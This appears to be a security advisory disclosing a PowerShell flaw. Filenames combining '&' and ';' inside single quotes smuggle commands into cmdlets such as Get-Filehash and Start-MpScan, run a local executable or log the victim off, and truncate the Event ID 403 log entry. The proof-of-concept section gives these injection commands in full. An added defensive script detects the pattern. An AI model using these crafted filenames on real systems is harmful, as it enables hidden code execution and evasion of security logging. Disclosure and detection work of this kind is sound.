Windows powershell event log bypass single quote code execution Vulnerability / Exploit


Exploits / Vulnerability Discovered : 2024-03-03 | Type : local | Platform : windows_x86-64



[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS_POWERSHELL_SINGLE_QUOTE_CODE_EXEC_EVENT_LOG_BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Microsoft Windows PowerShell

Built on the .NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.


[Vulnerability Type]
PowerShell Single Quote Code Execution / Event Log Bypass


[CVE Reference]
N/A


[Security Issue]
I previously disclosed how PowerShell executes unintended files or BASE64 code when processing specially crafted filenames.
This research builds on my "PSTrojanFile" work, adding a PS command-line single quote bypass and a PS event logging failure.
On the Windows command line, tab-completing a filename wraps it in double quotes, which can be leveraged to trigger arbitrary code execution.
However, if the filename was wrapped in single quotes, the attack failed, until now.

[Single Quote Code Exec Bypass]
By combining the semicolon ";" and ampersand "&" characters in a malicious filename, I found that the single quote limitation can be bypassed.
The trailing semicolon ";" delimits the .XML extension and helps trigger the PE file specified, in this case DOOM.exe, and the PS event log gets truncated.

Take the following three test cases using the Defender API, which takes a specially crafted filename.
C:\>powershell Set-ProcessMitigation -PolicyFilePath "Test;saps DOOM;.xml"

1) Double quotes OK
"Test;saps DOOM;.xml"

2) Single quotes FAILS
'Test;saps DOOM;.xml'

3) Single quotes BYPASS
'Test&DOOM;.xml'

Prefixing PowerShell API calls with the "powershell" cmd is a requirement, and this may affect many built-in PS API or module commands.
C:\Users\gg\Downloads\>powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'

Malware.exe lives in the Downloads dir. Notice that we only need a partial name as part of the .ZIP archive filename we are scanning here,
and that the filename also excludes the .EXE portion.


[PS Event Log Bypass]
On Windows, PowerShell event logging can be enabled to alert a SOC to suspicious activity and/or to provide forensic artifacts for incident response.
However, when bypassing PS single quotes I noticed an interesting side effect: the ampersand "&" character seems to truncate the PS event log.
For example, when processing 'Infected&Malware;.zip', Event ID 403 logs 'infected' and not the true name of 'Malware.exe', which was actually executed.

Want to mask the true name of the file from PowerShell Event logging? (Malware.exe lives in the same directory)
C:\>powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5

Below, the event log HostApplication field contains 'infected' and not the true name of Malware.exe, which was actually executed, due to the truncation.

[PS Log ID 403 Snippet]
Engine state is changed from Available to Stopped.

Details:
NewEngineState=Stopped
PreviousEngineState=Available

SequenceNumber=25

HostName=ConsoleHost
HostVersion=5.1.19041.1682
HostId=fecdc355-0e89-4d4c-a31d-7835cafa44f0
HostApplication=powershell get-filehash 'Infected
EngineVersion=5.1.19041.1682
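
A defender-side check for the two behaviours described above, as an added example that is not part of the original advisory: it flags filenames containing "&" or ";" and flags Event ID 403 records whose HostApplication value ends inside an open quote. The function names are hypothetical; the sample event text is abridged from the snippet above, and report-2024.zip is a constructed benign name.

```powershell
# Added example, not from the advisory. Function names are hypothetical.

function Test-RiskyFileName {
    param([Parameter(Mandatory)][string]$Path)
    # Flag leaf names containing '&' or ';', the two characters the
    # advisory's crafted filenames rely on.
    $leaf = [System.IO.Path]::GetFileName($Path)
    return $leaf.IndexOfAny([char[]]'&;') -ge 0
}

function Get-HostApplication {
    param([Parameter(Mandatory)][string]$Message)
    # Extract the HostApplication= value from an engine event message body.
    if ($Message -match '(?m)^\s*HostApplication=(.*?)\r?$') { return $Matches[1] }
}

function Test-TruncatedHostApplication {
    param([string]$HostApplication)
    # Heuristic: an odd number of ' or " means the recorded command line
    # stops inside a quoted argument, as in "get-filehash 'Infected".
    foreach ($quote in "'", '"') {
        if ([regex]::Matches($HostApplication, $quote).Count % 2) { return $true }
    }
    return $false
}

# Event 403 body abridged from the advisory's log snippet.
$sample403 = @'
Engine state is changed from Available to Stopped.
Details:
    NewEngineState=Stopped
    HostName=ConsoleHost
    HostApplication=powershell get-filehash 'Infected
    EngineVersion=5.1.19041.1682
'@

$hostApp = Get-HostApplication -Message $sample403
'{0} -> truncated: {1}' -f $hostApp, (Test-TruncatedHostApplication $hostApp)

# Two filenames from the advisory plus one constructed benign name.
'Infected&Malware;.zip', 'virus&logoff&test.zip', 'report-2024.zip' |
    ForEach-Object { '{0} -> risky: {1}' -f $_, (Test-RiskyFileName $_) }

# On a live host, feed real events through the same functions:
# Get-WinEvent -FilterHashtable @{ LogName = 'Windows PowerShell'; Id = 403 } |
#     Where-Object { Test-TruncatedHostApplication (Get-HostApplication $_.Message) }
```

The odd-quote test is a heuristic: a legitimate command line that contains an apostrophe also matches, so treat hits as leads to review alongside process-creation logs.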


[Exploit/POC]
powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5

Run some malware plus bypass logging of true file name:
C:\Users\gg\Downloads>powershell get-filehash 'Infected&Malware;.zip' -algorithm md5
The PE file Malware.exe is in the Downloads directory; notice the .zip we are scanning doesn't include .exe in the filename.

Defender Anti-Malware API:
powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'

Call ping cmd using double "&":
C:\>powershell Get-Filehash 'powerfail&ping 8.8.8.8&.txt' -algorithm md5

Call a Windows cmd to Logoff the victim:
C:\>powershell Start-MpScan -Scanpath 'virus&logoff&test.zip'

We have options:

A) to call commands use double "&" --> 'virus&logoff&test.zip'
B) bypass PS event logging of the true file name and execute code use "&" with ";" --> 'Infected&Malware;.zip'


[References]
https://github.com/hyp3rlinx/PSTrojanFile
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt
https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt


[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
Vendor Notification: circa 2019
December 27, 2023 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx